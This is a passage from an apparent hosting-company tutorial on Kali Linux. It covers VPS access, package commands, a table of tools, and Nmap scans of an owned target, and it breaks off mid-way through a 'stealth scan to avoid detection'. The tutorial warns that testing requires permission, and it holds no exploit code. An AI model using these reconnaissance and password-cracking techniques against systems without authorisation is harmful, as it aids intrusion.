{"id":119150,"date":"2024-11-22T14:03:13","date_gmt":"2024-11-22T14:03:13","guid":{"rendered":"\/tutorials\/?p=119150"},"modified":"2026-03-10T10:23:12","modified_gmt":"2026-03-10T10:23:12","slug":"kali-linux-tutorial","status":"publish","type":"post","link":"\/in\/tutorials\/kali-linux-tutorial","title":{"rendered":"Kali Linux tutorial: Essential commands, managing Kali tools, running scans, and more"},"content":{"rendered":"<?xml encoding=\"utf-8\" ?><p>As a security-focused operating system, Kali Linux lets you perform various tasks, such as penetration testing, digital forensics, and network analysis. With hundreds of security tools, Kali Linux is ideal for cybersecurity specialists and enthusiasts looking to expand their skills.<\/p><p>If you&rsquo;re interested in using Kali Linux but unsure where to start, you&rsquo;re in the right place. In this article, you&rsquo;ll learn how to run Kali Linux on a virtual private server (VPS), explore its essential commands, and manage its powerful tools.<\/p><p>You&rsquo;ll also get a chance to gain hands-on experience by conducting security assessments, from running network scans to exploiting vulnerabilities on target systems. By the end of this guide, you&rsquo;ll be ready to use Kali Linux to test and protect your environment confidently.<\/p><p>\n\n\n\n<\/p><h2 class=\"wp-block-heading\" id=\"h-accessing-kali-linux\">Accessing Kali Linux<\/h2><p>The first step for getting started with Kali Linux depends on where you&rsquo;ve installed it. For example, if you&rsquo;ve set up Kali Linux on a desktop computer, simply power on the device and log in directly. However, if you&rsquo;ve <a href=\"\/in\/tutorials\/how-to-install-kali-linux\">installed Kali Linux on Hostinger&rsquo;s VPS<\/a>, follow these steps instead:<\/p><ol class=\"wp-block-list\">\n<li>Log in to hPanel with your Hostinger account and navigate to <strong>VPS &rarr; Manage<\/strong>.<\/li>\n\n\n\n<li>In your VPS dashboard, find the <strong>VPS details<\/strong> section to view your SSH credentials.<\/li>\n<\/ol><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd82640\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/hpanel-vps-overview-vps-details-1024x327.png\" alt=\"The SSH username and IPv4 information in the VPS Overview section of hPanel\"><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><ol start=\"3\" class=\"wp-block-list\">\n<li>Open your terminal application and run the following command, replacing <strong>your_vps_ip_address<\/strong> with your actual VPS IP:<\/li>\n<\/ol><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh root@your_vps_ip_address<\/pre><p>Alternatively, hit the <strong>Browser terminal<\/strong> button to access your VPS directly without using any other app.<\/p><ol start=\"4\" class=\"wp-block-list\">\n<li>You&rsquo;ll be prompted to enter your password. Type it carefully and press <strong>Enter<\/strong>.<\/li>\n<\/ol><p>Once authenticated, you have command-line access to the Kali Linux environment on your VPS.<\/p><?xml encoding=\"utf-8\" ?><figure class=\"wp-block-image size-large\"><a href=\"\/in\/vps-hosting\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"300\" src=\"https:\/\/www.hostinger.com\/tutorials\/wp-content\/uploads\/sites\/2\/2023\/02\/VPS-hosting-banner-1024x300.png\" alt=\"\" class=\"wp-image-77934\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2023\/02\/VPS-hosting-banner.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2023\/02\/VPS-hosting-banner-300x88.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2023\/02\/VPS-hosting-banner-150x44.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2023\/02\/VPS-hosting-banner-768x225.png 768w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><h2 class=\"wp-block-heading\" id=\"h-essential-kali-linux-commands\">Essential Kali Linux commands<\/h2><p>Kali Linux shares the <a href=\"\/in\/tutorials\/linux-commands\">same commands<\/a> as other Linux distributions for navigation, file manipulation, and system monitoring. As a Debian-based distribution, it also uses similar package management commands as Ubuntu and other derivatives, including:<\/p><ul class=\"wp-block-list\">\n<li><strong>apt update<\/strong> &ndash; updates the list of available packages.<\/li>\n\n\n\n<li><strong>apt upgrade<\/strong> &ndash; upgrades all installed packages.<\/li>\n\n\n\n<li><strong>apt install [package_name]<\/strong> &ndash; installs a specific package.<\/li>\n\n\n\n<li><strong>apt remove [package_name]<\/strong> &ndash; uninstalls a package.<\/li>\n<\/ul><p>Since Kali Linux includes specialized security testing tools, you&rsquo;ll want to explore them over time. Here are some essential commands to operate these tools:<\/p><figure tabindex=\"0\" class=\"wp-block-table\"><table class=\"has-fixed-layout\"><tbody><tr><td><strong>Tool<\/strong><\/td><td><strong>Command<\/strong><\/td><td><strong>Usage<\/strong><\/td><\/tr><tr><td>Nmap<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">nmap [target_ip]<\/code><\/td><td>Scans networks, hosts, and services.<\/td><\/tr><tr><td>Metasploit<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">msfconsole<\/code><\/td><td>Launches the Metasploit console to exploit system vulnerabilities.<\/td><\/tr><tr><td>Aircrack-ng<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">aircrack-ng [options]<\/code><\/td><td>Performs Wi-Fi security testing.<\/td><\/tr><tr><td>Wireshark<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">wireshark<\/code><\/td><td>Analyzes network traffic.<\/td><\/tr><tr><td>Hydra<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">hydra [options]<\/code><\/td><td>Brute-forces logins to test password strength.<\/td><\/tr><tr><td>John the Ripper<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">john [file]<\/code><\/td><td>Cracks password hashes.<\/td><\/tr><tr><td>Nikto<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">nikto -h [target_ip]<\/code><\/td><td>Scans web servers to find vulnerabilities.<\/td><\/tr><tr><td>SQLmap<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">sqlmap [options]<\/code><\/td><td>Tests databases for SQL injection vulnerabilities.<\/td><\/tr><tr><td>Lynis<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">lynis audit system<\/code><\/td><td>Audits system security configurations.<\/td><\/tr><tr><td>Snort<\/td><td><code data-enlighter-language=\"generic\" class=\"EnlighterJSRAW\">snort [options]<\/code><\/td><td>Monitors network traffic for suspicious activity.<\/td><\/tr><\/tbody><\/table><\/figure><p>To work more efficiently in Kali Linux, consider learning these useful command-line shortcuts:<\/p><ul class=\"wp-block-list\">\n<li><strong>history<\/strong> &ndash; lists recent commands for easy reuse.<\/li>\n\n\n\n<li><strong>![number]<\/strong> &ndash; re-runs a command by its number from the history list.<\/li>\n\n\n\n<li><strong>clear<\/strong> &ndash; clears the terminal screen.<\/li>\n\n\n\n<li><strong>&ndash;help<\/strong> &ndash; provides usage information for most commands.<\/li>\n<\/ul><h2 class=\"wp-block-heading\" id=\"h-managing-kali-tools\">Managing Kali tools<\/h2><p>Kali Linux uses metapackages to install groups of related tools for specific security tasks. If you need Kali Linux for a particular purpose, you can install a metapackage tailored to that task instead of installing the entire toolset.<\/p><p>When you set up Kali Linux on your VPS, you received only the <strong>kali-linux-core<\/strong> package containing essential core tools. To verify which metapackages and tools are already installed, execute:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">apt list --installed | grep kali<\/pre><p>Here&rsquo;s the expected output:<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd83a8a\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"718\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-apt-list-installed-output-1024x718.png\" alt=\"The output of the apt list --installed command\" class=\"wp-image-119154\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-1024x718.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-300x210.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-150x105.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-768x539.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-1536x1077.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-apt-list-installed-output-2048x1436.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p>If you want to install additional packages, first update the system to maintain compatibility and avoid dependency issues:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt update\n\nsudo apt -y full-upgrade<\/pre><p>Then, install your desired metapackage. In this example, we&rsquo;ll use <strong>kali-linux-default<\/strong>, which includes various popular Kali Linux tools:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install -y kali-linux default<\/pre><p>You can also install other metapackages based on your needs. Here are some options:<\/p><ul class=\"wp-block-list\">\n<li><strong>kali-linux-headless<\/strong> &ndash; core tools without a graphical interface, ideal for VPS setups.<\/li>\n\n\n\n<li><strong>kali-linux-arm<\/strong> &ndash; tools optimized for ARM-based devices.<\/li>\n\n\n\n<li><strong>kali-linux-nethunter<\/strong> &ndash; for mobile penetration testing.<\/li>\n\n\n\n<li><strong>kali-tools-information-gathering<\/strong> &ndash; to collect data about targets.<\/li>\n\n\n\n<li><strong>kali-tools-vulnerability<\/strong> &ndash; to detect and analyze vulnerabilities.<\/li>\n\n\n\n<li><strong>kali-tools-web<\/strong> &ndash; for web application security testing.<\/li>\n\n\n\n<li><strong>kali-tools-passwords<\/strong> &ndash; to test and crack passwords.<\/li>\n\n\n\n<li><strong>kali-tools-database<\/strong> &ndash; to assess database security.<\/li>\n\n\n\n<li><strong>kali-tools-wireless<\/strong> &ndash; to test wireless network security.<\/li>\n\n\n\n<li><strong>kali-tools-reverse-engineering<\/strong> &ndash; to deconstruct and analyze malware.<\/li>\n\n\n\n<li><strong>kali-tools-exploitation<\/strong> &ndash; to exploit system vulnerabilities.<\/li>\n\n\n\n<li><strong>kali-tools-social-engineering<\/strong> &ndash; for social engineering scenarios.<\/li>\n\n\n\n<li><strong>kali-tools-sniffing-spoofing<\/strong> &ndash; to detect and imitate suspicious network traffic.<\/li>\n\n\n\n<li><strong>kali-tools-post-exploitation<\/strong> &ndash; to secure access post-exploitation.<\/li>\n\n\n\n<li><strong>kali-tools-forensics<\/strong> &ndash; for digital forensics and investigations.<\/li>\n\n\n\n<li><strong>kali-tools-reporting<\/strong> &ndash; to document and report findings.<\/li>\n<\/ul><p>If you prefer, you can also install individual tools. For example:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt install nmap<\/pre><p>Conversely, if you find certain tools unnecessary and want to free up space, you can delete them individually:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt remove [tool_name]<\/pre><p>Or, if you no longer need an entire metapackage, remove it with:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo apt remove [metapackage_name]<\/pre><h2 class=\"wp-block-heading\" id=\"h-using-kali-linux-for-security-testing\">Using Kali Linux for security testing<\/h2><p>This section demonstrates how to perform security testing using our Kali Linux VPS as the attack machine and another VPS with Ubuntu <strong>24.04<\/strong> as the target system.<\/p><p>For both servers, we use plans from Hostinger.<\/p><p>For the attack machine, we chose <a href=\"\/in\/vps\/kali-linux-hosting\">Kali VPS hosting&rsquo;s<\/a> KVM 1 plan, which offers <strong>4 GB<\/strong> of RAM and <strong>50 GB<\/strong> of NVMe storage for <strong>\u20b9599.00\/month<\/strong> &ndash; meeting Kali Linux&rsquo;s minimum requirements.<\/p><p>You can choose any plan for the target system, but we opted for a regular VPS <strong>KVM 1<\/strong> plan.<\/p><p>    <p class=\"warning\">\n        <strong>Warning!<\/strong> Always make sure you have permission to test any server or network. <strong>Unauthorized testing is illegal and unethical<\/strong>. In our case, we can practice freely since we own both VPS instances.    <\/p>\n    \n\n\n\n<\/p><h3 class=\"wp-block-heading\" id=\"h-running-network-scans-with-nmap\">Running network scans with Nmap<\/h3><p>Nmap is a network scanning tool for vulnerability assessment. Since you use two separate servers as the attack machine and target system, you&rsquo;re perfectly set up for network discovery and mapping using Nmap. Here&rsquo;s how:<\/p><p><strong>Basic Nmap scan<\/strong><\/p><p>To start with a simple scan, run:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap [target_ip]<\/pre><p>Replace <strong>[target_ip]<\/strong> with your target VPS&rsquo;s IP address. For Hostinger users, you can find the server&rsquo;s IP in hPanel by navigating to same <strong>VPS details <\/strong>section of your dashboard.<\/p><p>When executed, this command will:<\/p><ul class=\"wp-block-list\">\n<li>Discover open ports on the target.<\/li>\n\n\n\n<li>Identify active services.<\/li>\n\n\n\n<li>Provide preliminary information about the services.<\/li>\n<\/ul><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd84317\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"300\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-output-1024x300.png\" alt=\"The output of the nmap command\" class=\"wp-image-119159\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-1024x300.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-300x88.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-150x44.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-768x225.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-1536x451.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-output-2048x601.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Service and version detection<\/strong><\/p><p>To gather additional information about the services running on open ports, use the following:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -sV [target_ip]<\/pre><p>This command enables version detection for each service, helping you identify possible vulnerabilities in specific software versions.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd848c4\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"144\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-sv-output-1024x144.png\" alt=\"The output of the nmap -sV command\" class=\"wp-image-119160\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-1024x144.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-300x42.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-150x21.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-768x108.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-1536x216.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-sv-output-2048x288.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>OS detection<\/strong><\/p><p>To determine the operating system running on the target, execute:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -O [target_ip]<\/pre><p>The <strong>-O<\/strong> flag enables OS detection, which guesses the operating system based on the target&rsquo;s responses. Remember that Nmap may not always guess correctly, as it only provides a probability percentage for each OS match.<\/p><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd84e41\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"370\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-o-output-1024x370.png\" alt=\"The output of the nmap -O command\" class=\"wp-image-119161\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-1024x370.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-300x109.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-150x54.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-768x278.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-1536x556.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-o-output-2048x741.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Complete scan with service, OS, and aggressive timing<\/strong><\/p><p>For a thorough scan that includes common ports, running services, and OS detection, run:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nmap -A [target_ip]<\/pre><p>This command is more aggressive, sending more customized packets called probes to gather information, which might trigger firewalls or intrusion detection systems.<\/p><p>The <strong>-A<\/strong> option enables:<\/p><ul class=\"wp-block-list\">\n<li>OS detection.<\/li>\n\n\n\n<li>Version detection.<\/li>\n\n\n\n<li>Script scanning.<\/li>\n\n\n\n<li>Traceroute.<\/li>\n<\/ul><div class=\"wp-block-image\"><figure data-wp-context='{\"imageId\":\"69e085dd85669\"}' data-wp-interactive=\"core\/image\" class=\"aligncenter size-large wp-lightbox-container\"><img decoding=\"async\" width=\"1024\" height=\"605\" data-wp-class--hide=\"state.isContentHidden\" data-wp-class--show=\"state.isContentVisible\" data-wp-init=\"callbacks.setButtonStyles\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-on-async--load=\"callbacks.setButtonStyles\" data-wp-on-async-window--resize=\"callbacks.setButtonStyles\" src=\"\/tutorials\/wp-content\/uploads\/sites\/2\/2024\/11\/terminal-nmap-a-output-1024x605.png\" alt=\"The output of the nmap -A command\" class=\"wp-image-119162\" srcset=\"https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-1024x605.png 1024w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-300x177.png 300w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-150x89.png 150w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-768x454.png 768w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-1536x908.png 1536w, https:\/\/www.hostinger.com\/in\/tutorials\/wp-content\/uploads\/sites\/52\/2024\/11\/terminal-nmap-a-output-2048x1210.png 2048w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><button class=\"lightbox-trigger\" type=\"button\" aria-haspopup=\"dialog\" aria-label=\"Enlarge\" data-wp-init=\"callbacks.initTriggerButton\" data-wp-on-async--click=\"actions.showLightbox\" data-wp-style--right=\"state.imageButtonRight\" data-wp-style--top=\"state.imageButtonTop\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"12\" height=\"12\" fill=\"none\" viewbox=\"0 0 12 12\">\n\t\t\t\t<path fill=\"#fff\" d=\"M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z\"><\/path>\n\t\t\t<\/svg>\n\t\t<\/button><\/figure><\/div><p><strong>Stealth scan to avoid detection<\/strong><\/p><p>In contrast, if you prefer a subtle scan that&rsquo;s less likely to be detected by firewalls or intrusion detection systems, try a TCP SYN scan:<\/p><pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" 